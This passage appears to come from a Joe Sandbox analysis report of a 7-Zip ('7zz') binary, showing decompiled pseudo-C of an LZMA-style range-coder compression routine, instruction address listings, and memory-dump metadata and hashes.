					if(_t295 == 0) {
						_t589 =  *(_t624 + 0x3bcf0);
						__eflags = _t589 |  *(_t624 + 0x3bcf4);
						 *(_t625 + 0x10) = _t589;
						 *(_t625 + 0x18) = _t589;
						if((_t589 |  *(_t624 + 0x3bcf4)) != 0) {
							L16:
							_t296 =  *( *(_t624 + 8))(_t422);
							__eflags = _t296;
							if(_t296 == 0) {
								L82:
								_t288 = _t624 + 0x3bcf0;
								 *_t288 =  *(_t624 + 0x3bcf0) + _t589 -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *_t288;
								asm("adc dword [ebp+0x3bcf4], 0x0");
								return E00461A80(_t624, _t589);
							}
							while(1) {
								__eflags =  *(_t624 + 0x3bca8);
								if( *(_t624 + 0x3bca8) == 0) {
									_push(_t625 + 0x10);
									_push(_t589);
									_push(_t624);
									_t300 = E004602E0();
								} else {
									_push(_t625 + 0x10);
									_t300 = E004615B0(_t624);
								}
								_t425 =  *(_t624 + 0x325a8) &  *(_t625 + 0x14);
								 *(_t625 + 0x18) = _t300;
								 *(_t625 + 0x28) = _t425;
								__eflags = _t300 - 1;
								if(_t300 != 1) {
									goto L30;
								}
								__eflags =  *(_t625 + 0x10) - 0xffffffff;
								if( *(_t625 + 0x10) != 0xffffffff) {
									goto L30;
								} else {
									_t525 = ( *(_t624 + 0x3194c) << 4) + _t425;
									_t394 =  *(_t624 + 0x325b0 + _t525 * 2) & 0x0000ffff;
									_t606 = _t624 + 0x3bcb0;
									 *_t606 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t394;
									 *(_t624 + 0x325b0 + _t525 * 2) = (0x800 - _t394 >> 5) + _t394;
									_t395 =  *_t606;
									__eflags = _t395 - 0x1000000;
									if(_t395 < 0x1000000) {
										_t405 = _t395 << 8;
										__eflags = _t405;
										 *_t606 = _t405;
										L0045F780(_t606);
									}
									_t398 =  *((intOrPtr*)( *((intOrPtr*)(_t624 + 0xc))))() -  *(_t624 + 0x31938);
									 *(_t625 + 0x28) =  *_t398;
									_t459 = _t606;
									_t537 = ((( *(_t398 - 1) & 0x000000ff) >> 8 -  *(_t624 + 0x32598)) + (( *(_t624 + 0x325a4) &  *(_t625 + 0x14)) <<  *(_t624 + 0x32598))) * 0x600 +  *((intOrPtr*)(_t624 + 0x325ac));
									__eflags =  *(_t624 + 0x3194c) - 7;
									if( *(_t624 + 0x3194c) >= 7) {
										__eflags = _t398 -  *(_t624 + 0x3193c);
										L0045FAB0( *(_t625 + 0x2c) & 0x000000ff, _t459, _t537,  *(_t398 -  *(_t624 + 0x3193c) - 1) & 0x000000ff);
									} else {
										L0045FA30( *(_t625 + 0x28) & 0x000000ff, _t459, _t537);
									}
									 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								}
								L69:
								_t452 =  *(_t625 + 0x18);
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - _t452;
								_t324 =  *(_t624 + 0x31938);
								 *(_t625 + 0x14) =  *(_t625 + 0x14) + _t452;
								__eflags = _t324;
								if(_t324 != 0) {
									L18:
									_t589 =  *(_t625 + 0x14);
									continue;
								}
								__eflags =  *(_t624 + 0x3bca8) - _t324;
								if( *(_t624 + 0x3bca8) == _t324) {
									__eflags =  *(_t624 + 0x3bcf8) - 0x80;
									if( *(_t624 + 0x3bcf8) >= 0x80) {
										E00461BC0(_t624);
									}
									__eflags =  *(_t624 + 0x32590) - 0x10;
									if( *(_t624 + 0x32590) >= 0x10) {
										E00461B30(_t624);
									}
								}
								_t539 =  *(_t624 + 8);
								_t327 =  *_t539();
								__eflags = _t327;
								if(_t327 == 0) {
									L81:
									_t589 =  *(_t625 + 0x14);
									goto L82;
								}
								_t329 =  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
								__eflags =  *(_t625 + 0x2c);
								if( *(_t625 + 0x2c) != 0) {
									__eflags = _t329 + 0x112c -  *((intOrPtr*)(_t625 + 0x34));
									if(_t329 + 0x112c >=  *((intOrPtr*)(_t625 + 0x34))) {
										goto L81;
									}
									asm("cdq");
									asm("adc edx, [ebp+0x3bcdc]");
									asm("adc edx, [ebp+0x3bcc4]");
									_t338 =  *((intOrPtr*)(_t624 + 0x3bcc8)) -  *((intOrPtr*)(_t624 + 0x3bcd0)) +  *((intOrPtr*)(_t624 + 0x3bcd8)) +  *((intOrPtr*)(_t624 + 0x3bcc0)) + 0x2000;
									asm("adc edx, 0x0");
									__eflags = _t539;
									if(__eflags > 0) {
										goto L81;
									}
									if(__eflags < 0) {
										goto L18;
									} else {
										__eflags = _t338 -  *((intOrPtr*)(_t625 + 0x30));
										if(_t338 <  *((intOrPtr*)(_t625 + 0x30))) {
											goto L18;
										} else {
											goto L81;
										}
									}
									L85:
									_t292 = _t624 + 0x3bcf0;
									 *_t292 =  *(_t624 + 0x3bcf0) +  *(_t625 + 0x14) -  *((intOrPtr*)(_t625 + 0x1c));
									__eflags =  *_t292;
									asm("adc dword [ebp+0x3bcf4], 0x0");
									return E00461A30(_t624);
									goto L86;
								}
								__eflags = _t329 - 0x8000;
								if(_t329 < 0x8000) {
									goto L18;
								}
								goto L85;
								L30:
								_t508 =  *(_t624 + 0x3bcb0);
								_t604 = _t624 + 0x325b0 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2;
								_t304 =  *_t604 & 0x0000ffff;
								_t438 = (_t508 >> 0xb) * _t304;
								 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t438;
								asm("adc dword [ebp+0x3bcbc], 0x0");
								 *(_t624 + 0x3bcb0) = _t508 - _t438;
								 *_t604 = _t304 - (_t304 >> 5);
								_t306 =  *(_t624 + 0x3bcb0);
								__eflags = _t306 - 0x1000000;
								if(_t306 < 0x1000000) {
									_t392 = _t306 << 8;
									__eflags = _t392;
									 *(_t624 + 0x3bcb0) = _t392;
									L0045F780(_t624 + 0x3bcb0);
								}
								__eflags =  *(_t625 + 0x10) - 4;
								_t510 =  *(_t624 + 0x3194c);
								if( *(_t625 + 0x10) >= 4) {
									_t307 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t307;
									 *(_t624 + 0x32730 + _t510 * 2) = (0x800 - _t307 >> 5) + _t307;
									_t308 =  *(_t624 + 0x3bcb0);
									__eflags = _t308 - 0x1000000;
									if(_t308 < 0x1000000) {
										_t351 = _t308 << 8;
										__eflags = _t351;
										 *(_t624 + 0x3bcb0) = _t351;
										L0045F780(_t624 + 0x3bcb0);
									}
									__eflags =  *(_t624 + 0x3bca8);
									 *(_t624 + 0x3194c) =  *(0x47c60c +  *(_t624 + 0x3194c) * 4);
									 *(_t625 + 0x24) = 0 |  *(_t624 + 0x3bca8) == 0x00000000;
									L0045FD50(_t425, _t624 + 0x3bcb0, _t624 + 0x32c14,  *(_t625 + 0x18) + 0xfffffffe);
									__eflags =  *(_t625 + 0x20);
									if( *(_t625 + 0x20) != 0) {
										_t218 = _t624 + 0x3741c + _t425 * 4;
										 *_t218 =  *(_t624 + 0x3741c + _t425 * 4) - 1;
										__eflags =  *_t218;
										if( *_t218 == 0) {
											__eflags = _t425 * 0x440;
											L0045FE90(_t624 + 0x32c14, _t624 + 0x30ea0, _t425,  *((intOrPtr*)(_t624 + 0x37418)), _t425 * 0x440 + _t624 + 0x33018);
											 *((intOrPtr*)(_t624 + 0x3741c +  *(_t625 + 0x28) * 4)) =  *((intOrPtr*)(_t624 + 0x37418));
										}
									}
									_t315 =  *(_t625 + 0x10) - 4;
									 *(_t625 + 0x10) = _t315;
									__eflags = _t315 - 0x80;
									if(_t315 >= 0x80) {
										_t449 = ( ~(0x1ffff - _t315 >> 0x1f) & 0x0000000a) + 6;
										_t316 = _t315 >> _t449;
										__eflags = _t316;
										_t605 = ( *(_t316 + _t624 + 0x306a0) & 0x000000ff) + _t449 * 2;
									} else {
										_t605 =  *(_t315 + _t624 + 0x306a0) & 0x000000ff;
									}
									_t317 =  *(_t625 + 0x18);
									__eflags = _t317 - 5;
									if(_t317 >= 5) {
										_t318 = 3;
									} else {
										_t318 = _t317 + 0xfffffffe;
									}
									_push(_t605);
									_push(6);
									_push((_t318 << 7) + _t624 + 0x32910);
									L0045FC40(_t624 + 0x3bcb0);
									__eflags = _t605 - 4;
									if(_t605 >= 4) {
										_t343 = (_t605 >> 1) - 1;
										_t544 = (_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1;
										_t428 =  *(_t625 + 0x10) - ((_t605 & 0x00000001 | 0x00000002) << (_t605 >> 1) - 1);
										__eflags = _t605 - 0xe;
										if(_t605 >= 0xe) {
											L0045F8F0(_t624 + 0x3bcb0, _t428 >> 4, _t343 + 0xfffffffc);
											L0045FCC0(4, _t624 + 0x3bcb0, _t624 + 0x32bf4, _t428 & 0x0000000f);
											_t254 = _t624 + 0x32590;
											 *_t254 =  *(_t624 + 0x32590) + 1;
											__eflags =  *_t254;
										} else {
											L0045FCC0(_t343, _t624 + 0x3bcb0, _t624 + 0x32b0e + (_t544 - _t605) * 2, _t428);
										}
									}
									_t259 = _t624 + 0x3bcf8;
									 *_t259 =  *(_t624 + 0x3bcf8) + 1;
									__eflags =  *_t259;
									 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
									 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
									 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
									 *(_t624 + 0x3193c) =  *(_t625 + 0x10);
								} else {
									_t353 =  *(_t624 + 0x32730 + _t510 * 2) & 0x0000ffff;
									_t550 =  *(_t624 + 0x3bcb0);
									_t474 = (_t550 >> 0xb) * _t353;
									 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t474;
									asm("adc dword [ebp+0x3bcbc], 0x0");
									 *(_t624 + 0x3bcb0) = _t550 - _t474;
									 *(_t624 + 0x32730 + _t510 * 2) = _t353 - (_t353 >> 5);
									_t355 =  *(_t624 + 0x3bcb0);
									__eflags = _t355 - 0x1000000;
									if(_t355 < 0x1000000) {
										_t390 = _t355 << 8;
										__eflags = _t390;
										 *(_t624 + 0x3bcb0) = _t390;
										L0045F780(_t624 + 0x3bcb0);
									}
									_t356 =  *(_t625 + 0x10);
									__eflags = _t356;
									if(_t356 != 0) {
										_t612 = _t624 + 0x32748 +  *(_t624 + 0x3194c) * 2;
										_t358 =  *_t612 & 0x0000ffff;
										 *(_t625 + 0x20) =  *(_t624 + 0x3193c + _t356 * 4);
										_t553 =  *(_t624 + 0x3bcb0);
										_t479 = (_t553 >> 0xb) * _t358;
										 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t479;
										asm("adc dword [ebp+0x3bcbc], 0x0");
										 *(_t624 + 0x3bcb0) = _t553 - _t479;
										 *_t612 = _t358 - (_t358 >> 5);
										_t360 =  *(_t624 + 0x3bcb0);
										__eflags = _t360 - 0x1000000;
										if(_t360 < 0x1000000) {
											_t380 = _t360 << 8;
											__eflags = _t380;
											 *(_t624 + 0x3bcb0) = _t380;
											L0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x10) - 1;
										if( *(_t625 + 0x10) != 1) {
											_t555 =  *(_t624 + 0x3bcb0);
											_t613 = _t624 + 0x32760 +  *(_t624 + 0x3194c) * 2;
											_t362 =  *_t613 & 0x0000ffff;
											_t484 = (_t555 >> 0xb) * _t362;
											 *((intOrPtr*)(_t624 + 0x3bcb8)) =  *((intOrPtr*)(_t624 + 0x3bcb8)) + _t484;
											asm("adc dword [ebp+0x3bcbc], 0x0");
											 *(_t624 + 0x3bcb0) = _t555 - _t484;
											 *_t613 = _t362 - (_t362 >> 5);
											_t364 =  *(_t624 + 0x3bcb0);
											__eflags = _t364 - 0x1000000;
											if(_t364 < 0x1000000) {
												_t374 = _t364 << 8;
												__eflags = _t374;
												 *(_t624 + 0x3bcb0) = _t374;
												L0045F780(_t624 + 0x3bcb0);
											}
											L0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32778 +  *(_t624 + 0x3194c) * 2,  *(_t625 + 0x10) + 0xfffffffe);
											__eflags =  *(_t625 + 0x10) - 3;
											if( *(_t625 + 0x10) == 3) {
												 *(_t624 + 0x31948) =  *(_t624 + 0x31944);
											}
											_t425 =  *(_t625 + 0x28);
											 *(_t624 + 0x31944) =  *(_t624 + 0x31940);
										} else {
											_t562 =  *(_t624 + 0x3194c);
											_t376 =  *(_t624 + 0x32760 + _t562 * 2) & 0x0000ffff;
											 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t376;
											 *(_t624 + 0x32760 + _t562 * 2) = (0x800 - _t376 >> 5) + _t376;
											_t377 =  *(_t624 + 0x3bcb0);
											__eflags = _t377 - 0x1000000;
											if(_t377 < 0x1000000) {
												 *(_t624 + 0x3bcb0) = _t377 << 8;
												L0045F780(_t624 + 0x3bcb0);
											}
										}
										 *(_t624 + 0x31940) =  *(_t624 + 0x3193c);
										 *(_t624 + 0x3193c) =  *(_t625 + 0x20);
									} else {
										_t570 =  *(_t624 + 0x3194c);
										_t382 =  *(_t624 + 0x32748 + _t570 * 2) & 0x0000ffff;
										 *(_t624 + 0x3bcb0) = ( *(_t624 + 0x3bcb0) >> 0xb) * _t382;
										 *(_t624 + 0x32748 + _t570 * 2) = (0x800 - _t382 >> 5) + _t382;
										_t383 =  *(_t624 + 0x3bcb0);
										__eflags = _t383 - 0x1000000;
										if(_t383 < 0x1000000) {
											_t388 = _t383 << 8;
											__eflags = _t388;
											 *(_t624 + 0x3bcb0) = _t388;
											L0045F780(_t624 + 0x3bcb0);
										}
										__eflags =  *(_t625 + 0x18) - 1;
										L0045F9D0(_t624 + 0x3bcb0, _t624 + 0x32790 + (( *(_t624 + 0x3194c) << 4) + _t425) * 2, 0 |  *(_t625 + 0x18) != 0x00000001);
										_t425 =  *(_t625 + 0x28);
									}
									__eflags =  *(_t625 + 0x18) - 1;
									if( *(_t625 + 0x18) != 1) {
										__eflags =  *(_t624 + 0x3bca8);
										_push(0 | __eflags == 0x00000000);
										E00460070( *(_t625 + 0x18) + 0xfffffffe, _t624 + 0x3bcb0, _t425, _t624 + 0x30ea0, __eflags, _t624 + 0x3745c);
										 *(_t624 + 0x3194c) =  *(0x47c63c +  *(_t624 + 0x3194c) * 4);
									} else {
										 *(_t624 + 0x3194c) =  *(0x47c66c +  *(_t624 + 0x3194c) * 4);
									}
								}
								goto L69;
							}
						} else {
							_t407 =  *( *(_t624 + 8))();
							__eflags = _t407;
							if(_t407 != 0) {
								E004600C0(_t624, _t625 + 0x24);
								_t500 =  *(_t624 + 0x3194c) << 5;
								_t410 =  *(_t500 + _t624 + 0x325b0) & 0x0000ffff;
								_t622 = _t624 + 0x3bcb0;
								 *_t622 = ( *(_t624 + 0x3bcb0) >> 0xb) * _t410;
								 *(_t500 + _t624 + 0x325b0) = (0x800 - _t410 >> 5) + _t410;
								_t411 =  *_t622;
								__eflags = _t411 - 0x1000000;
								if(_t411 < 0x1000000) {
									_t417 = _t411 << 8;
									__eflags = _t417;
									 *_t622 = _t417;
									L0045F780(_t622);
								}
								 *(_t624 + 0x3194c) =  *(0x47c5dc +  *(_t624 + 0x3194c) * 4);
								L0045FA30( *((intOrPtr*)( *((intOrPtr*)(_t624 + 4))))() & 0x000000ff, _t622,  *((intOrPtr*)(_t624 + 0x325ac)));
								 *(_t624 + 0x31938) =  *(_t624 + 0x31938) - 1;
								_t589 = _t589 + 1;
								__eflags = _t589;
								 *(_t625 + 0x10) = _t589;
								goto L16;
							} else {
								return E00461A80(_t624, _t589);
							}
						}
					} else {
						 *((intOrPtr*)(_t624 + 0x3bcfc)) = 1;
						return _t295;
					}
				}
				L86:
			}













































































                                                                                  0x00461ef4
                                                                                  0x00461eff
                                                                                  0x00461f07
                                                                                  0x00461f09
                                                                                  0x00461f09
                                                                                  0x00461f1a
                                                                                  0x00461f20
                                                                                  0x0046278e
                                                                                  0x00461f2e
                                                                                  0x00461f34
                                                                                  0x00461f36
                                                                                  0x00461f36
                                                                                  0x00461f47
                                                                                  0x00461f49
                                                                                  0x00461f49
                                                                                  0x00461f53
                                                                                  0x00461f5b
                                                                                  0x00461f70
                                                                                  0x00461f78
                                                                                  0x00461f7e
                                                                                  0x00461f82
                                                                                  0x00461f86
                                                                                  0x00462042
                                                                                  0x00462049
                                                                                  0x0046204b
                                                                                  0x0046204d
                                                                                  0x0046276c
                                                                                  0x00462773
                                                                                  0x00462773
                                                                                  0x00462773
                                                                                  0x0046277b
                                                                                  0x00000000
                                                                                  0x00462789
                                                                                  0x00462064
                                                                                  0x00462064
                                                                                  0x0046206b
                                                                                  0x0046207f
                                                                                  0x00462080
                                                                                  0x00462081
                                                                                  0x00462082
                                                                                  0x0046206d
                                                                                  0x00462071
                                                                                  0x00462074
                                                                                  0x00462074
                                                                                  0x0046208d
                                                                                  0x00462091
                                                                                  0x00462095
                                                                                  0x00462099
                                                                                  0x0046209c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004620a2
                                                                                  0x004620a7
                                                                                  0x00000000
                                                                                  0x004620ad
                                                                                  0x004620b6
                                                                                  0x004620b8
                                                                                  0x004620cd
                                                                                  0x004620d9
                                                                                  0x004620e7
                                                                                  0x004620ea
                                                                                  0x004620ec
                                                                                  0x004620f1
                                                                                  0x004620f3
                                                                                  0x004620f3
                                                                                  0x004620f6
                                                                                  0x004620f8
                                                                                  0x004620f8
                                                                                  0x00462105
                                                                                  0x00462121
                                                                                  0x00462132
                                                                                  0x0046213c
                                                                                  0x00462142
                                                                                  0x00462149
                                                                                  0x00462158
                                                                                  0x00462169
                                                                                  0x0046214b
                                                                                  0x00462151
                                                                                  0x00462151
                                                                                  0x0046217b
                                                                                  0x0046217b
                                                                                  0x004626b8
                                                                                  0x004626b8
                                                                                  0x004626bc
                                                                                  0x004626c2
                                                                                  0x004626c8
                                                                                  0x004626cc
                                                                                  0x004626ce
                                                                                  0x00462060
                                                                                  0x00462060
                                                                                  0x00000000
                                                                                  0x00462060
                                                                                  0x004626d4
                                                                                  0x004626da
                                                                                  0x004626dc
                                                                                  0x004626e6
                                                                                  0x004626ea
                                                                                  0x004626ea
                                                                                  0x004626ef
                                                                                  0x004626f6
                                                                                  0x004626fa
                                                                                  0x004626fa
                                                                                  0x004626f6
                                                                                  0x00462702
                                                                                  0x00462705
                                                                                  0x00462707
                                                                                  0x00462709
                                                                                  0x00462768
                                                                                  0x00462768
                                                                                  0x00000000
                                                                                  0x00462768
                                                                                  0x0046270f
                                                                                  0x00462713
                                                                                  0x00462718
                                                                                  0x0046271f
                                                                                  0x00462723
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00462731
                                                                                  0x00462738
                                                                                  0x00462744
                                                                                  0x0046274a
                                                                                  0x0046274f
                                                                                  0x00462754
                                                                                  0x00462756
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00462758
                                                                                  0x00000000
                                                                                  0x0046275e
                                                                                  0x0046275e
                                                                                  0x00462762
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00462762
                                                                                  0x0046279c
                                                                                  0x004627a6
                                                                                  0x004627a6
                                                                                  0x004627a6
                                                                                  0x004627ac
                                                                                  0x004627bf
                                                                                  0x00000000
                                                                                  0x004627bf
                                                                                  0x00462791
                                                                                  0x00462796
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00462186
                                                                                  0x0046218c
                                                                                  0x00462197
                                                                                  0x0046219e
                                                                                  0x004621a6
                                                                                  0x004621a9
                                                                                  0x004621af
                                                                                  0x004621bf
                                                                                  0x004621c5
                                                                                  0x004621c8
                                                                                  0x004621ce
                                                                                  0x004621d3
                                                                                  0x004621d5
                                                                                  0x004621d5
                                                                                  0x004621de
                                                                                  0x004621e4
                                                                                  0x004621e4
                                                                                  0x004621e9
                                                                                  0x004621ee
                                                                                  0x004621f4
                                                                                  0x004624d6
                                                                                  0x004624f1
                                                                                  0x00462503
                                                                                  0x00462506
                                                                                  0x0046250c
                                                                                  0x00462511
                                                                                  0x00462513
                                                                                  0x00462513
                                                                                  0x0046251c
                                                                                  0x00462522
                                                                                  0x00462522
                                                                                  0x0046253a
                                                                                  0x00462540
                                                                                  0x00462555
                                                                                  0x0046255f
                                                                                  0x00462564
                                                                                  0x00462569
                                                                                  0x0046256b
                                                                                  0x0046256b
                                                                                  0x0046256b
                                                                                  0x00462572
                                                                                  0x00462576
                                                                                  0x00462598
                                                                                  0x004625a7
                                                                                  0x004625a7
                                                                                  0x00462572
                                                                                  0x004625b2
                                                                                  0x004625b5
                                                                                  0x004625b9
                                                                                  0x004625be
                                                                                  0x004625d9
                                                                                  0x004625dc
                                                                                  0x004625dc
                                                                                  0x004625e6
                                                                                  0x004625c0
                                                                                  0x004625c0
                                                                                  0x004625c0
                                                                                  0x004625e9
                                                                                  0x004625ed
                                                                                  0x004625f0
                                                                                  0x004625f7
                                                                                  0x004625f2
                                                                                  0x004625f2
                                                                                  0x004625f2
                                                                                  0x004625fc
                                                                                  0x00462607
                                                                                  0x00462609
                                                                                  0x00462610
                                                                                  0x00462615
                                                                                  0x00462618
                                                                                  0x00462627
                                                                                  0x0046262d
                                                                                  0x0046262f
                                                                                  0x00462631
                                                                                  0x00462634
                                                                                  0x0046265e
                                                                                  0x00462679
                                                                                  0x0046267e
                                                                                  0x0046267e
                                                                                  0x0046267e
                                                                                  0x00462636
                                                                                  0x00462647
                                                                                  0x00462647
                                                                                  0x00462634
                                                                                  0x00462696
                                                                                  0x00462696
                                                                                  0x00462696
                                                                                  0x0046269c
                                                                                  0x004626a6
                                                                                  0x004626ac
                                                                                  0x004626b2
                                                                                  0x004621fa
                                                                                  0x004621fa
                                                                                  0x00462209
                                                                                  0x00462214
                                                                                  0x00462217
                                                                                  0x0046221d
                                                                                  0x0046222d
                                                                                  0x00462233
                                                                                  0x00462236
                                                                                  0x0046223c
                                                                                  0x00462241
                                                                                  0x00462243
                                                                                  0x00462243
                                                                                  0x0046224c
                                                                                  0x00462252
                                                                                  0x00462252
                                                                                  0x00462257
                                                                                  0x0046225b
                                                                                  0x0046225d
                                                                                  0x004622f8
                                                                                  0x004622ff
                                                                                  0x00462302
                                                                                  0x00462306
                                                                                  0x00462311
                                                                                  0x00462314
                                                                                  0x0046231a
                                                                                  0x0046232a
                                                                                  0x00462330
                                                                                  0x00462333
                                                                                  0x00462339
                                                                                  0x0046233e
                                                                                  0x00462340
                                                                                  0x00462340
                                                                                  0x00462349
                                                                                  0x0046234f
                                                                                  0x0046234f
                                                                                  0x00462354
                                                                                  0x00462359
                                                                                  0x004623c1
                                                                                  0x004623c7
                                                                                  0x004623ce
                                                                                  0x004623d6
                                                                                  0x004623d9
                                                                                  0x004623df
                                                                                  0x004623ef
                                                                                  0x004623f5
                                                                                  0x004623f8
                                                                                  0x004623fe
                                                                                  0x00462403
                                                                                  0x00462405
                                                                                  0x00462405
                                                                                  0x0046240e
                                                                                  0x00462414
                                                                                  0x00462414
                                                                                  0x00462434
                                                                                  0x00462439
                                                                                  0x0046243e
                                                                                  0x00462446
                                                                                  0x00462446
                                                                                  0x00462452
                                                                                  0x00462456
                                                                                  0x0046235b
                                                                                  0x0046235b
                                                                                  0x00462361
                                                                                  0x0046237c
                                                                                  0x0046238e
                                                                                  0x00462391
                                                                                  0x00462397
                                                                                  0x0046239c
                                                                                  0x004623ab
                                                                                  0x004623b1
                                                                                  0x004623b1
                                                                                  0x0046239c
                                                                                  0x00462466
                                                                                  0x0046246c
                                                                                  0x00462263
                                                                                  0x00462263
                                                                                  0x00462269
                                                                                  0x00462284
                                                                                  0x00462296
                                                                                  0x00462299
                                                                                  0x0046229f
                                                                                  0x004622a4
                                                                                  0x004622a6
                                                                                  0x004622a6
                                                                                  0x004622af
                                                                                  0x004622b5
                                                                                  0x004622b5
                                                                                  0x004622c2
                                                                                  0x004622dd
                                                                                  0x004622e2
                                                                                  0x004622e2
                                                                                  0x00462472
                                                                                  0x00462477
                                                                                  0x00462497
                                                                                  0x004624b1
                                                                                  0x004624b9
                                                                                  0x004624cb
                                                                                  0x00462479
                                                                                  0x00462486
                                                                                  0x00462486
                                                                                  0x00462477
                                                                                  0x00000000
                                                                                  0x004621f4
                                                                                  0x00461f8c
                                                                                  0x00461f92
                                                                                  0x00461f94
                                                                                  0x00461f96
                                                                                  0x00461fb0
                                                                                  0x00461fc1
                                                                                  0x00461fc4
                                                                                  0x00461fcc
                                                                                  0x00461fdf
                                                                                  0x00461fed
                                                                                  0x00461ff0
                                                                                  0x00461ff2
                                                                                  0x00461ff7
                                                                                  0x00461ff9
                                                                                  0x00461ff9
                                                                                  0x00461ffc
                                                                                  0x00461ffe
                                                                                  0x00461ffe
                                                                                  0x00462019
                                                                                  0x00462032
                                                                                  0x00462037
                                                                                  0x0046203d
                                                                                  0x0046203d
                                                                                  0x0046203e
                                                                                  0x00000000
                                                                                  0x00461f98
                                                                                  0x00461fa6
                                                                                  0x00461fa6
                                                                                  0x00461f96
                                                                                  0x00461f5d
                                                                                  0x00461f5d
                                                                                  0x00461f6b
                                                                                  0x00461f6b
                                                                                  0x00461f5b
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
                                                                                  • Instruction ID: 111ae33a3b18cc3aeac857ece66931766c3972f92f30f96c0da3dc925ecae691
                                                                                  • Opcode Fuzzy Hash: d4105cb9875b833a4641f56c3298e018c9a015dc758ede18aa80ab4fa4bcddc2
                                                                                  • Instruction Fuzzy Hash: D532C0716142898FCB36CF29CD916DD37AAFFA8308F10452AED498B394EF349A45CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00460DF8 Relevance: .5, Instructions: 487COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 98%
                                                                                  			E00460DF8() {
				signed int _t647;
				signed int _t650;
				void* _t659;
				signed int _t662;
				signed int _t663;
				unsigned int _t672;
				signed int _t673;
				intOrPtr _t678;
				signed int _t681;
				signed int _t683;
				void* _t686;
				signed int _t688;
				signed int _t689;
				void* _t694;
				signed int _t695;
				signed int _t697;
				signed int _t699;
				signed int _t702;
				signed int _t704;
				void* _t706;
				signed int _t711;
				intOrPtr _t719;
				signed int _t725;
				signed int _t727;
				void* _t728;
				signed int _t733;
				void* _t734;
				intOrPtr _t735;
				signed int _t737;
				void* _t740;
				signed int _t746;
				intOrPtr _t754;
				signed int _t760;
				signed int _t762;
				void* _t765;
				intOrPtr* _t766;
				signed int _t767;
				signed int _t769;
				intOrPtr _t773;
				intOrPtr* _t775;
				signed int _t780;
				void* _t784;
				signed int _t791;
				void* _t792;
				signed int _t793;
				signed int _t795;
				signed int _t799;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t810;
				void* _t811;
				signed int _t815;
				void* _t822;
				signed int _t828;
				signed int _t829;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				intOrPtr* _t854;
				signed int _t858;
				signed int _t874;
				void* _t882;
				signed int _t896;
				signed int _t898;
				signed int _t902;
				intOrPtr* _t903;
				signed int _t908;
				void* _t910;
				signed int _t913;
				signed int* _t917;
				signed int _t919;
				intOrPtr _t920;
				signed int _t935;
				signed int _t939;
				intOrPtr* _t940;
				intOrPtr* _t943;
				void* _t944;
				void* _t945;
				signed int _t948;
				signed int _t952;
				intOrPtr* _t953;
				signed int _t966;
				signed int _t970;
				signed int _t971;
				void* _t972;
				signed int _t977;
				signed int _t982;
				signed int _t986;
				signed int _t988;
				void* _t992;
				signed int _t993;
				signed int _t995;
				signed int _t1012;
				void* _t1018;
				signed int _t1019;
				intOrPtr _t1023;
				signed int _t1024;
				signed int _t1027;
				intOrPtr _t1029;
				signed int _t1030;
				signed int _t1037;
				signed int _t1041;
				void* _t1047;
				void* _t1061;
				intOrPtr _t1064;
				intOrPtr _t1071;
				intOrPtr* _t1072;
				void* _t1077;
				intOrPtr _t1079;
				signed int _t1080;
				signed int _t1087;
				signed int _t1096;
				intOrPtr* _t1099;
				signed int _t1101;
				signed int _t1106;
				void* _t1108;
				signed int _t1118;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int _t1128;
